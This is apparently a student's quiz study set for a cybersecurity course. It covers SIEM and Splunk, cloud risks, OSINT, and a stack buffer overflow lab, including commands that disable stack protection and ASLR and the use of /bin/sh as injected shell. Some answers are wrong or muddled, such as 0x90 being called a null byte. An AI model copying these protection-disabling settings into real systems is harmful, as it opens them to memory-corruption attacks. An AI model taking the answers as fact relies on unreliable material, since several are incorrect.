Cyber 262 - Quiz C
key insights and situational awareness can visualized with creation of what SIEM tools
dashboard
key insights and situational awareness can be visualized with
dashboards
gcc stack.c ‐o stack_gdb ‐g ‐z execstack ‐fno‐stack‐protector
debug mode for compiler c
name servers
dns
The value of $2 in our GDB command represented?
ebp - stack pointer
temporary storage area in system memory
exploiting
The program "exploit.py" has a buffer overflow vulnerability. When it is compiled the resulting binary can have it's stack overflowed.
false
VM sprawl is a security concern because it involves artificially intelligent hypervisors that split off new hosts causing a sprawl effect
false
a SIEM is not intended to be used for monitoring and analysis of log data from applications, databases, and middleware
false
buffer overflows are no longer an issue, in facts a search of the CISA site for current buffer overflow vulnerabilities would yield little or no results
false
heap overflows are easier to preform than stack overflows
false
in class we focused on stack based buffer overflows because heap based overflows cannot perform code injection
false
machine data is only generated by network equipment
false
one of the 7 essential capabilities of an analytical driven SIEM is endpoint management
false
pointer tracking of function calls makes it hard to use stack memory for overflows
false
the top 3 cloud providers are amazons web service (AWS), Microsoft (azure), and sales force
false
/bin/program is the shell in linux for our exploit
false (correct answer is /bin/sh)
Gathering as much information about the target
footprinting
sending malformed data as input and testing code for unexpected results
fuzzing
sending malformed data as input trying to get programs to crash
fuzzing
intitle:"SpeedStream Router Management Interface"
google syntax
Data Loss or Data Leakage in the cloud can occur in many ways. Choose ALL that apply.
- weak authentication - lack of audit controls - failure to properly dispose of hard drives
Shell that we are injecting into the malicious code
/bin/sh
kernel.randomize_va_space=0
ASLR
way to prevent buffer overflows but randomizing memory allocation
ASLR
base pointer (active stack frame)
EBP - base or frame pointer
a segmentation fault can be caused by a program trying to access an off limits memory location
true
buffer overflows are still a threat
true
compress and archive is not a main component of spluk
true
data loss in the cloud can occur due to weak authentication or lack of audit controls
true
digital footprints or forensic data in logs are IOCs
true
overwriting a programs return address with some random address can point to invalid instructions and eventually malicious code
true
push and pop are part of the LIFO stack memory activities
true
roles define what users can do in splunk
true
the EBP points to the function callers stack
true
What value does the exploit.py program put into badfile to make part of the buffer fill with null values?
0x90`
How many bytes need to be added to the offset that we gathered when running the GDB debugs? This offset is required to take into account the gap with the Return Address and the EBP pointer.
4
100 in HEX
64
NOP or null bye in hex is
90
c compiler debugger
GDB
After the Capital One AWS cloud breach by Paige Thompson, Amazon added ________________ to act as a defense in depth mechanism to improve session authentication? This is also referred to as a new version of the Metadata Services.
IMDSv2
null values placed into the buffer
NOPs
return address field on the stack
RT
machine data is almost always ____
unstructured
technology that automates incident response, threat intel, and automation using workflows
SOAR
a vulnerability with a certain hypervisor that allows direct interaction from a guest to that hypervisor
VM escape
vulnerability with a hypervisor that allows direct interaction from a guest to that hypervisor
VM escape
attack that flooded buffer with N's repeadelty
code red
memory allocation like alloc and malloc are part of what memory segment
heap
capability of SIEM that helps manage potential breaches and their aftermath to reduce recovery times
incident response
which essential capability of analytics-driven siem requires managing a potential breach and the aftermath to limit damage and reduce recovery time
incident response
A recent breach at ABC Corp revealed information in log files consistent with that found in other attacks. In this case, information such as domain names, IP addresses and malware signatures are considered ?
indicators of compromise - IOC
Which cloud computing attack risk is concerned with the security of a set of functions used for connection to cloud services?
insecure APIs
cloud attack risk dealing with the security of functions used for connection to cloud services
insecure APIs
which cloud computing attack risk is considered with the security of a set of functions used for connection to cloud services
insecure APIs
allows users to visualize their elastic search data
kibana
allows users to visualize their elasticsearch data
kibana
________ data makes up for more then 90% of the data accumulated by organizations
machine
Which cloud computing attack risk resides in organizations and can cause significant losses because of the potential knowledge and access the attacker has?
malicious insiders
which cloud computing attack risks resides in organizations and can cause significant losses because of the potential knowledge and can access the attacker has
malicious insiders
a top osint tool that runs on kali
maltego
Option when on C program compile to disable stack protection
no stack protecter
term that means our organizations data center assets reside in our own data center and not in the cloud
on premise
searching for public information about people or organizations
osint
Indirect recon approach and does not engage the victim
passive
what are the 3 main default roles in splunk
power user admin
Address in our Buffer Overflow Lab we want to replace
return address
in our less and lab we focused on overwriting the _________ to point malicious code
return pointer
a segmentation fault can be caused by a program trying to access an off limit memory location
true
google maps
satellite imagery
splunk _____ strings are sent from the search head
search
what is at the heart of cloud services and considered a key requirement to managing soruces
self service
what is at the heart of cloud services and considered a key requirement. this feature is often not feasible for companies who try to manage their own environments on premise
self service
Allow user to run a program with the program owner's privilege
set uid
search engine optimized for finding connected devices
shodan
Splunk knows where to break the event, where the time stamp is located and how to automatically create field value pairs using these.
source types
Splunk uses ____________ to categorize the type of data being indexed.
source types
Program we used in the lab that had a buffer overflow vulnerability
stack
buffer overflows that are easier and deal with memory used for functions
stack
buffer overflows that are easier to perform than heap
stack
the ______ can dynamically allocate local variables used in functions. it can pass values and parameters to the functions
stack
stack fills from
top down
in splunk, the creating of visualizations and statistics is done by ________ commands
transforming
One of the reasons that organizations would move to the cloud is to focus on their core business and basically outsource the running of the Data Center and systems to a third party
true
One of the reasons that organizations would move to the cloud is to focus on their core business and basically outsource the running of the Data Center and systems to a third party?
true
Recon-NG is an OSINT tool that is part of Kali and has an interface similar to Metasploit.
true
SPLUNK and QRadar are considered SIEM tools
true
The program "stack.c", when compiled has a Buffer Overflow Vulnerability.
true
VM sprawl is a security concern because servers are easily created and often un managed
true
